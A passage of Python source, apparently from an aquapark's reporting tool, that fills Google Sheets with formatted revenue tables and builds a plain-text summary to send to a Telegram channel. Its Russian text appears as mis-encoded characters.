self.nex_line += 2
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[['ะะฐะทะฒะฐะฝะธะต', 'ะะพะปะธัะตััะฒะพ', 'ะกัะผะผะฐ']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT', 'textFormat': {'bold': True, 'fontSize': 14}})
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#f7cb4d")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet5_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
for group in self.agentreport_dict_month:
if group == 'ะะพะฝััะพะปัะฝะฐั ััะผะผะฐ':
continue
if group == 'ะะฐัะฐ':
continue
if group == 'ะะต ััะธััะฒะฐัั':
continue
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
group,
self.agentreport_dict_month[group]["ะัะพะณะพ ะฟะพ ะณััะฟะฟะต"][0][1],
self.agentreport_dict_month[group]["ะัะพะณะพ ะฟะพ ะณััะฟะฟะต"][0][2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': True, 'fontSize': 12}},
{'textFormat': {'bold': True, 'fontSize': 12}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': True, 'fontSize': 12}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for folder in self.agentreport_dict_month[group]:
if folder == 'ะัะพะณะพ ะฟะพ ะณััะฟะฟะต':
continue
if folder == '':
continue
self.nex_line += 1
if folder is None:
folder_name = 'ะะตะท ะณััะฟะฟะธัะพะฒะบะธ'
else:
folder_name = folder
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
folder_name,
self.agentreport_dict_month[group][folder][0][1],
self.agentreport_dict_month[group][folder][0][2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet4_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for servise in self.agentreport_dict_month[group][folder]:
if servise[0] == 'ะัะพะณะพ ะฟะพ ะฟะฐะฟะบะต':
continue
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[[
servise[0],
servise[1],
servise[2]
]], "ROWS"
)
ss.prepare_setCellsFormats(
f"A{self.nex_line}:C{self.nex_line}",
[
[
{'textFormat': {'bold': False}},
{'textFormat': {'bold': False}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': False}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
for j in range(self.sheet5_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
while self.nex_line < self.sheet5_height:
self.nex_line += 1
ss.prepare_setValues(
f"A{self.nex_line}:C{self.nex_line}",
[['', '', '']], "ROWS"
)
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{'horizontalAlignment': 'LEFT',
'textFormat': {'bold': False, 'fontSize': 10}})
ss.prepare_setCellsFormat(f"A{self.nex_line}:C{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#ffffff")},
fields="userEnteredFormat.backgroundColor")
for j in range(self.sheet5_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1,
"endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "NONE", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
# ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 6
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ะปะธััะฐ 6...')
sheetId = 5
ss = to_google_sheets.Spreadsheet(self.spreadsheet['spreadsheetId'], sheetId, self.googleservice,
self.spreadsheet['sheets'][sheetId]['properties']['title'])
# ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ั ะดะฐะฝะฝัะผะธ
weekday_rus = [
"ะะพะฝะตะดะตะปัะฝะธะบ",
"ะัะพัะฝะธะบ",
"ะกัะตะดะฐ",
"ะงะตัะฒะตัะณ",
"ะััะฝะธัะฐ",
"ะกัะฑะฑะพัะฐ",
"ะะพัะบัะตัะตะฝัะต",
]
self.nex_line = self.start_line
ss.prepare_setValues(
f"A{self.nex_line}:P{self.nex_line}",
[
[
datetime.strftime(self.finreport_dict_beach['ะะฐัะฐ'][0], '%d.%m.%Y'),
weekday_rus[self.finreport_dict_beach['ะะฐัะฐ'][0].weekday()],
f'=\'ะะปะฐะฝ\'!L{self.nex_line}',
self.finreport_dict_beach['ะัั
ะพะด ั ะฟะปัะถะฐ'][0],
f'=\'ะะปะฐะฝ\'!M{self.nex_line}',
str(self.finreport_dict_beach['ะัะพะณะพ ะฟะพ ะพััะตัั'][1]).replace('.', ','),
self.finreport_dict_beach['ะะตะฟะพะทะธั'][1],
self.finreport_dict_beach['ะะฐััั'][0],
self.finreport_dict_beach['ะะฐััั'][1],
f"=IFERROR(I{self.nex_line}/H{self.nex_line};0)",
self.finreport_dict_beach['ะฃัะปัะณะธ'][0],
self.finreport_dict_beach['ะฃัะปัะณะธ'][1],
f"=IFERROR(L{self.nex_line}/K{self.nex_line};0)",
self.finreport_dict_beach['ะขะพะฒะฐัั'][0],
self.finreport_dict_beach['ะขะพะฒะฐัั'][1],
f"=IFERROR(O{self.nex_line}/N{self.nex_line};0)",
]
],
"ROWS"
)
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัั ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{self.nex_line}:P{self.nex_line}",
[
[
{'numberFormat': {'type': 'DATE', 'pattern': 'dd.mm.yyyy'}, 'horizontalAlignment': 'LEFT'},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
if self.nex_line % 2 != 0:
ss.prepare_setCellsFormat(f"A{self.nex_line}:P{self.nex_line}",
{"backgroundColor": functions.htmlColorToJSON("#fef8e3")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet6_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": self.nex_line - 1, "endRowIndex": self.nex_line,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
# ------------------------------------------- ะะฐะฟะพะปะฝะตะฝะธะต ะะขะะะ --------------------------------------
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
f'ะะฐะฟะพะปะฝะตะฝะธะต ัััะพะบะธ ะะขะะะ ะฝะฐ ะปะธััะต 2...')
for i, line_table in enumerate(self.spreadsheet['sheets'][1]['data'][0]['rowData']):
try:
if line_table['values'][0]['formattedValue'] == "ะะขะะะ":
# ะัะปะธ ัััะพะบะฐ ะฟะตัะตะฟะธััะฒะฐะตััั - ะธัะพะณะพ ะฝะฐ 1 ะฟะพะท ะฒะฝะธะท, ะตัะปะธ ะฝะพะฒะฐั - ะฝะฐ 2 ะฟะพะท
height_table = i + self.reprint
break
else:
height_table = 4
except KeyError:
pass
ss.prepare_setValues(f"A{height_table}:P{height_table}",
[[f'ะะขะะะ',
"",
f"=SUM(C3:C{height_table - 1})",
f"=SUM(D3:D{height_table - 1})",
f"=SUM(E3:E{height_table - 1})",
f"=SUM(F3:F{height_table - 1})",
f"=SUM(G3:G{height_table - 1})",
f"=SUM(H3:H{height_table - 1})",
f"=SUM(I3:I{height_table - 1})",
f"=IFERROR(ROUND(I{height_table}/H{height_table};2);0)",
f"=SUM(K3:K{height_table - 1})",
f"=SUM(L3:L{height_table - 1})",
f"=IFERROR(ROUND(L{height_table}/K{height_table};2);0)",
f"=SUM(N3:N{height_table - 1})",
f"=SUM(O3:O{height_table - 1})",
f"=IFERROR(ROUND(O{height_table}/N{height_table};2);0)",
]],
"ROWS")
ss.prepare_setValues(f"A{height_table + 1}:D{height_table + 1}",
[[f'ะัะฟะพะปะฝะตะฝะธะต ะฟะปะฐะฝะฐ (ััะฐัะธะบ)',
"",
f"=IFERROR('ะะปะฐะฝ'!L{self.sheet2_line};0)",
f"=IFERROR(ROUND(D{height_table}/C{height_table + 1};2);0)",
]],
"ROWS")
ss.prepare_setValues(f"A{height_table + 2}:D{height_table + 2}",
[[f'ะัะฟะพะปะฝะตะฝะธะต ะฟะปะฐะฝะฐ (ะดะพั
ะพะด)',
"",
f"=IFERROR('ะะปะฐะฝ'!M{self.sheet2_line};0)",
f"=IFERROR(ROUND(F{height_table}/C{height_table + 2};2);0)",
]],
"ROWS")
# ะะฐะดะฐะฝะธะต ัะพัะผะฐัะฐ ะฒัะฒะพะดะฐ ัััะพะบะธ
ss.prepare_setCellsFormats(
f"A{height_table}:P{height_table}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
{'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'},
'horizontalAlignment': 'RIGHT', 'textFormat': {'bold': True}},
]
]
)
ss.prepare_setCellsFormats(
f"A{height_table + 1}:D{height_table + 1}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
ss.prepare_setCellsFormats(
f"A{height_table + 2}:D{height_table + 2}",
[
[
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00[$ โฝ]'}},
{'textFormat': {'bold': True}, 'horizontalAlignment': 'RIGHT',
'numberFormat': {'type': 'CURRENCY', 'pattern': '#,##0.00%'}},
]
]
)
# ะฆะฒะตั ัะพะฝะฐ ััะตะตะบ
ss.prepare_setCellsFormat(f"A{height_table}:P{height_table}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
ss.prepare_setCellsFormat(f"A{height_table + 1}:D{height_table + 1}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
ss.prepare_setCellsFormat(f"A{height_table + 2}:D{height_table + 2}",
{"backgroundColor": functions.htmlColorToJSON("#fce8b2")},
fields="userEnteredFormat.backgroundColor")
# ะะพัะดะตั
for j in range(self.sheet6_width):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table - 1, "endRowIndex": height_table,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for j in range(4):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table, "endRowIndex": height_table + 1,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
for j in range(4):
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"top": {"style": "SOLID", "width": 1, "color": {"red": 0, "green": 0, "blue": 0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"right": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"left": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.requests.append({"updateBorders": {
"range": {"sheetId": ss.sheetId, "startRowIndex": height_table + 1, "endRowIndex": height_table + 2,
"startColumnIndex": j,
"endColumnIndex": j + 1},
"bottom": {"style": "SOLID", "width": 1,
"color": {"red": 0, "green": 0, "blue": 0, "alpha": 1.0}}}})
ss.runPrepared()
def open_googlesheet(self):
"""
ะัะบััะฒะฐะตั ะฑัะฐัะทะตั ั ัะตะบััะตะน ะณัะณะป-ัะฐะฑะปะธัะตะน
"""
if not self.open_browser:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะบัััะธะต ัะฐะนะปะฐ-ะพััะตัะฐ ะฒ ะฑัะฐัะทะตัะต...')
self.show_dialog_variant(f'ะัะบัััั Google-ะพััะตั?',
'ะัะบัััั Google-ะพััะตั?',
webbrowser.open,
self.spreadsheet['spreadsheetUrl']
)
self.open_browser = True
    def sms_report(self):
        """
        Build the plain-text (SMS) version of the financial report.

        Reads the figures already collected into ``self.finreport_dict`` and
        ``self.itog_report_org2`` (values look like ``(count, amount)`` pairs --
        TODO confirm against the code that fills these dicts), writes the text
        to ``reports/<date>_sms.txt`` and returns it.

        :return: str
        """
        logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพััะฐะฒะปะตะฝะธะต SMS-ะพััะตัะฐ...')
        resporse = 'ะััะตั ะฟะพ ะฐะบะฒะฐะฟะฐัะบั ะทะฐ '
        # Header: single day vs. date range (the stored end date is exclusive,
        # hence the "- timedelta(1)" everywhere below).
        if self.finreport_dict['ะะฐัะฐ'][0] == self.finreport_dict['ะะฐัะฐ'][1] - timedelta(1):
            resporse += f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%d.%m.%Y")}:\n'
        else:
            resporse += f'{datetime.strftime(self.finreport_dict["ะะฐัะฐ"][0], "%d.%m.%Y")} - {datetime.strftime(self.finreport_dict["ะะฐัะฐ"][1] - timedelta(1), "%d.%m.%Y")}:\n'
        # Full breakdown only when there is a non-zero grand total.
        if self.finreport_dict['ะะขะะะ'][1]:
            resporse += f'ะัะดะธ - {self.finreport_dict["ะะพะป-ะฒะพ ะฟัะพั
ะพะดะพะฒ"][0]};\n'
            resporse += f'ะะพ ะฐะบะฒะฐะฟะฐัะบั - {self.finreport_dict["ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ"][1] + self.finreport_dict["ะะธะปะตัั ะฐะบะฒะฐะฟะฐัะบะฐ ะะะ ะ"][1]:.2f} โฝ;\n'
            resporse += f"ะะพ ะพะฑัะตะฟะธัั - {(self.finreport_dict['ะะฑัะตะฟะธั'][1] + self.finreport_dict['ะกะผะฐะนะป'][1]):.2f} โฝ;\n"
            resporse += f'ะขะตัะผะพะทะพะฝะฐ - {self.finreport_dict["ะขะตัะผะพะทะพะฝะฐ"][1] + self.finreport_dict["ะขะตัะผะพะทะพะฝะฐ ะะะ ะ"][1]:.2f} โฝ;\n'
            resporse += f'ะัะพัะตะต - {self.finreport_dict["ะัะพัะตะต"][1]:.2f} โฝ;\n'
            resporse += f"ะะฑัะฐั ะฟะพ ะะะ ะกั - {self.finreport_dict['ะะขะะะ'][1]:.2f} โฝ;\n"
            resporse += f'ONLINE ะฟัะพะดะฐะถะธ - {self.finreport_dict["Online ะัะพะดะฐะถะธ"][1]:.2f} โฝ;\n'
        # Fallback: if the block above did not run, still report the catering
        # figure (and the grand total) when there were catering sales.
        if not re.search(r'ะะพ ะพะฑัะตะฟะธัั', resporse) and self.finreport_dict['ะกะผะฐะนะป'][1]:
            resporse += f"ะะพ ะพะฑัะตะฟะธัั - {self.finreport_dict['ะกะผะฐะนะป'][1]:.2f} โฝ;\n"
            resporse += f"ะะฑัะฐั ะฟะพ ะะะ ะกั - {self.finreport_dict['ะะขะะะ'][1]:.2f} โฝ;\n"
        # Beach organisation block -- only when its report has a total.
        if self.itog_report_org2['ะัะพะณะพ ะฟะพ ะพััะตัั'][1]:
            # resporse += 'ะััะตั ะฟะพ ะฟะปัะถั ะทะฐ '
            # if beach_report['ะะฐัะฐ'][0] + timedelta(1) == beach_report['ะะฐัะฐ'][1]:
            #     resporse += f'{datetime.strftime(beach_report["ะะฐัะฐ"][0], "%d.%m.%Y")}:\n'
            # else:
            #     resporse += f'{datetime.strftime(beach_report["ะะฐัะฐ"][0], "%d.%m.%Y")} - {datetime.strftime(beach_report["ะะฐัะฐ"][0], "%d.%m.%Y")}:\n'
            try:
                resporse += f'ะัะดะธ (ะฟะปัะถ) - {self.itog_report_org2["ะะตัะฝัั ะทะพะฝะฐ | ะะะะะะะะข | 1 ะฟัะพั
ะพะด"][0]};\n'
            except KeyError:
                # The beach visitor counter may be absent for this period.
                pass
            resporse += f'ะัะพะณะพ ะฟะพ ะฟะปัะถั - {self.itog_report_org2["ะัะพะณะพ ะฟะพ ะพััะตัั"][1]:.2f} โฝ;\n'
        resporse += f'ะะตะท ะงะ.'
        # Persist a copy of the text next to the other generated reports.
        with open(f'reports/{self.date_from.strftime("%Y.%m.%d")}_sms.txt', 'w', encoding='utf-8') as f:
            f.write(resporse)
        return resporse
def send_message_to_telegram(self):
"""
ะัะฟัะฐะฒะบะฐ ะพััะตัะฐ ะฒ telegram
"""
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะัะฟัะฐะฒะบะฐ SMS-ะพััะตัะฐ ะฒ Telegram-ะบะฐะฝะฐะป...')
if self.telegram_proxy_use:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: ะกะพะตะดะธะฝะตะฝะธะต ั ะฟัะพะบัะธ-ัะตัะฒะตัะพะผ {self.telegram_proxy_ip}...')
if self.telegram_proxy_auth:
socks.setdefaultproxy(proxy_type=getattr(socks, self.telegram_proxy_type),
addr=self.telegram_proxy_ip,
port=int(self.telegram_proxy_port),
rdns=True,
username=self.telegram_proxy_username,
password=self.telegram_proxy_password,
)
else:
socks.setdefaultproxy(proxy_type=getattr(socks, self.telegram_proxy_type),
addr=self.telegram_proxy_ip,
port=int(self.telegram_proxy_port),
)
socket.socket = socks.socksocket
bot = telepot.Bot(self.telegram_token)
for line in self.sms_report_list:
logging.info(f'{__name__}: {str(datetime.now())[:-7]}: '
